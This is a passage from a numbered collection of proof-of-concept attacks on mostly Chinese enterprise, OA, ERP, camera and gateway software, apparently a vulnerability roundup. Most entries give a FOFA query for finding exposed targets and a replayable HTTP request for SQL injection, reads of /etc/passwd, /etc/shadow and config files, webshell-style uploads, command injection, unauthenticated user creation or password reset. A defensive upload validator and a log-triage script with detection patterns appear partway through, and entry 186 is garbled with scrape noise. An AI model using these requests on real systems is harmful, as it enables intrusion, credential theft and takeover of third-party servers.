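        dest = safe_upload_path(base_dir, file_name)
    except UploadRejected as exc:
        return f"rejected:{exc}"
    return f"accepted:{dest}:{len(decode_file_flow(file_flow_b64))}"


if __name__ == "__main__":
    # The exact fileName/fileFlow pair from the entry 161 PoC.
    print(upload_verdict("/srv/uploads", "../../../../dizxdell.aspx", "andqbmFnc3phc3d1ZGh0bmhwYXc="))
    print(upload_verdict("/srv/uploads", "../../../../notes.pdf", "andqbmFnc3phc3d1ZGh0bmhwYXc="))
```

Order matters: the name is validated before the body is decoded, so a rejected request never costs a base64 decode of a large payload, and the extension check runs on the reduced name so that a traversal prefix cannot hide the .aspx.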
165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"

URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

The URL is truncated in the source. The injection point is the sortOrder parameter: the value lands in an ORDER BY clause, and the CASE expression gives a boolean-based oracle (5240=5240 is the true branch).


166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"

POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host: x.x.x.x
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

solutionNo decodes to ' AND 4172 IN (SELECT (CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(111)))-- bErE. The CHAR() chain spells hello, so an MSSQL conversion error containing hello in the response confirms the injection.


167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"

GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Web.Config is the natural first target: it holds the connection strings and, where configured, the machineKey.


168. 宏景EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"

GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

The path value is copied from the original PoC as captured; it is an application-specific encoding of the target path, not a plain or percent-encoded file name, so replay it verbatim.


169. 宏景EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"

GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Time-based MSSQL injection in id (about 5 seconds of delay). The /templates/attestation/../../ prefix is sent literally, not normalised by the client; it is part of the PoC and gets the request routed without a session.


170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"

POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

Same literal ../../ prefix as entry 169; the file to read goes in the filename form parameter.


171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA: body="/808gps/"

GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

Time-based MySQL injection in ids. The ;downloadLogger.action suffix is a matrix parameter: the container strips it before dispatching to delete.do, while the path as written is what the access rules see.


172. DT-高清车牌识别摄像机 (DT HD licence-plate recognition camera) arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"

GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The ../ segments must reach the device unnormalised, so send the request with a raw client (Burp Repeater, curl --path-as-is), not a browser.


173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"

POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

The traversal sits in the POST body, so access logs alone will not show it. Gateways with the Remote Access VPN or Mobile Access blade enabled are affected; apply the vendor hotfix.


174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"

GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close


175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"

GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Time-based MSSQL injection in IncentiveID; note the trailing slash after .aspx in the path, which is part of the PoC.


176. 电信网关配置管理系统 rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"

POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

The source does not give the stored path.


177. H3C router sensitive information disclosure
Each path fetches the device configuration file without authentication; the .cfg name is the router model, so use the one matching the target:

/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

As with entry 172, the ../ segments must reach the device unnormalised.


178. H3C校园网自助服务系统 (IMC selfservice) flexFileUpload arbitrary file upload
FOFA: header="/selfservice"

POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

The %2e%2e segment is the point of the PoC: the request is routed under /imc/primepush/ but resolves one level up, and the verification path below shows the same trick. As the stored name, the handler uses the form field name (12234.txt), not filename.

GET /imc/primepush/%2e%2e/flex/12234.txt


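Several PoCs in this section share request shapes that are easy to spot in web server access logs: percent-encoded or literal dot-dot traversal (entries 160, 169, 170, 172, 178), a matrix-parameter suffix on the path (171), time- or error-based SQL markers in the query string (169, 171, 175, 181, 183, 186, 189) and a handful of fixed endpoints (156, 158, 173). The script below is an added example written for this page, not a tool from any vendor or from the original article. The log lines it parses are constructed to mirror the request lines above, the endpoint table is a starting point rather than a complete signature set, and the NCSA-style log format is an assumption.

```python
"""Access-log triage for the request shapes used by the PoCs in this section:
dot-dot traversal (encoded or literal), matrix-parameter paths, blind/error SQLi
markers in the query, and a few fixed endpoints. Example code for this page;
the sample log lines are constructed, not captured."""
import re
from urllib.parse import unquote, unquote_plus

# NCSA combined-style line: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# (decoded path prefix, substring required in the decoded query or None, label).
# Prefix matching is deliberate: these apps are mounted under varying context paths.
KNOWN_ENDPOINTS = [
    ("/device.rsp", "cmd=___S_O_S_T_R_E_A_MAX___", "TBK DVR command injection (CVE-2024-3721)"),
    ("/clients/MyCRL", None, "Check Point MyCRL (CVE-2024-24919; payload is in the POST body)"),
    ("/index.cfm/_api/json/v1/default/", "method=processAsyncObject", "Mura/Masa CMS processAsyncObject (CVE-2024-32640)"),
    ("/include/file.php", None, "LyLme Spage file.php upload (CVE-2024-34982)"),
    ("/imc/primepush/", None, "H3C IMC primepush flexFileUpload"),
    ("/webservices/WebJobUpload.asmx", None, "INFINITT PACS WebJobUpload"),
]

# Time-based and error-based markers seen above (MSSQL, MySQL, PostgreSQL, SQLite,
# Oracle). Applied to the decoded query string only.
SQLI_RE = re.compile(
    r"(?i)(waitfor\s+delay|pg_sleep\s*\(|\bsleep\s*\(|randomblob\s*\(|benchmark\s*\(|"
    r"updatexml\s*\(|ctxsys\.drithsx\.sn|char\(\d+\)\+char\()"
)


def decode_twice(s):
    """Percent-decode up to two rounds so %2e%2e and %252e%252e both yield '..'."""
    for _ in range(2):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def analyze_target(target):
    """Return the set of finding labels for one request-target (path?query) string."""
    findings = set()
    raw_path, _, raw_query = target.partition("?")
    path = decode_twice(raw_path)
    segments = path.split("/")
    # Tomcat/Spring strip matrix params ('x.do;y.action') before routing, so an ACL
    # that matches the raw path sees a different resource than the one served.
    if any(";" in seg for seg in segments):
        findings.add("matrix-parameter in path")
    if any(seg.split(";", 1)[0] == ".." for seg in segments):
        findings.add("dot-dot path traversal")
    query = unquote_plus(decode_twice(raw_query))
    if SQLI_RE.search(query):
        findings.add("SQL injection payload in query")
    for prefix, needle, label in KNOWN_ENDPOINTS:
        if path.startswith(prefix) and (needle is None or needle in query):
            findings.add(label)
    return findings


def scan(lines):
    """Parse log lines; return (client, method, target, sorted findings) for hits only."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyze_target(m["target"])
        if findings:
            hits.append((m["client"], m["method"], m["target"], sorted(findings)))
    return hits


# Constructed sample lines that replay request lines from the PoCs above.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jun/2024:10:01:02 +0800] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.6 - - [05/Jun/2024:10:01:03 +0800] "GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
    '10.0.0.7 - - [05/Jun/2024:10:01:04 +0800] "POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1" 200 64',
    '10.0.0.8 - - [05/Jun/2024:10:01:05 +0800] "GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1" 200 93',
    '10.0.0.9 - - [05/Jun/2024:10:01:06 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20ls%20-l%20%2Fvar HTTP/1.1" 200 301',
    '10.0.0.10 - - [05/Jun/2024:10:01:07 +0800] "POST /clients/MyCRL HTTP/1.1" 200 1407',
    "10.0.0.11 - - [05/Jun/2024:10:01:08 +0800] \"GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1\" 500 0",
]

if __name__ == "__main__":
    for client, method, target, findings in scan(SAMPLE_LOG):
        print(client, method, target[:60], "->", "; ".join(findings))
```

Two design points: the path is decoded twice and split before the .. test, so `%2e%2e`, `%252e%252e` and a literal `..` all collapse to the same check, and the matrix-parameter test runs on the decoded segments so that `delete.do;downloadLogger.action` is flagged even though the segment before the semicolon is an ordinary resource name. The Check Point entry is listed by endpoint only, because the traversal in 173 never appears in the request line.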
179. 建文工程管理系统 arbitrary file read

POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=


180. 帮管客 CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"

GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Error-based MySQL injection in the xu parameter: the updatexml() error message in the response carries the result of user() between the ~ (0x7e) markers.


181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"

POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

Time-based MSSQL injection in the start parameter.


182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"

POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

Creates the account test1234 / test1234 without authentication; when checking a live system, remove the account afterwards.


183. 广州图创图书馆集群管理系统 (Interlib) updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"

GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Oracle error-based injection in the token parameter: the ctxsys.drithsx.sn error echoes 111111*111111 = 12345654321. The handler is a password-change endpoint, so replaying this against a live system can alter the account named in loginid.


184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"

POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The endpoint executes the raw SQL statement sent as the body; this one inserts a user root with password 123456.


185. 瑞友天翼应用虚拟化系统 SQL injection
Affected: version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"

GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

Stacked-query injection in appid that writes a file with SELECT ... INTO OUTFILE. The hex string decodes to <?php echo md5("1"); $file = __FILE__; unlink($file); and the destination is .\..\..\WebRoot\plom.xgi, i.e. the web root. Requesting /plom.xgi on a vulnerable host returns c4ca4238a0b923820dcc509a6f75849b (md5 of "1") and the file deletes itself. The write requires the MySQL account to have FILE privilege and secure_file_priv not to block the path.


& `6 c" W7 o( w186. F-logic DataCube3 SQL注入
. x* L' y( |: N4 U/ PCVE-2024-31750
9 x+ l' \1 X' T  D( \F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统# j( u# x! Z9 C% O( d. ]
FOFA:title=="DataCube3"( ~5 S, L9 B: _5 Q
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
0 ^. B. X) `, a" }# kHost: your-ip
4 ?( }$ x/ }9 x% DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0. Z$ \8 S5 X4 s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8/ i. |7 \/ H6 A: Y& Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 |( Y0 u4 j/ P" M% _7 u2 PAccept-Encoding: gzip, deflate
# m: P, ]$ X3 IConnection: close
8 x$ U, e6 A6 z1 mContent-Type: application/x-www-form-urlencoded7 M5 l7 A, Q" c

4 E1 N' `2 T. O9 Q  C! `req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
7 D: s& F6 p2 a5 M
/ j3 y3 i2 @7 ~" r  f9 ^) y7 b5 S! S; O' A
187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Mura CMS"

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

Time-based variant (MySQL SLEEP) of the injection shown in entry 158; %5c is the backslash that breaks out of the escaped quote.


188. 叁体-佳会视频会议 attachment arbitrary file read
Affected: version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"

GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"; if a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability exists.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager_upload endpoint file upload
Fofa:title="Authenticate Please!"

1. Run the PoC to obtain the CSRF value and a cookie, then upload the file and request it to see the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

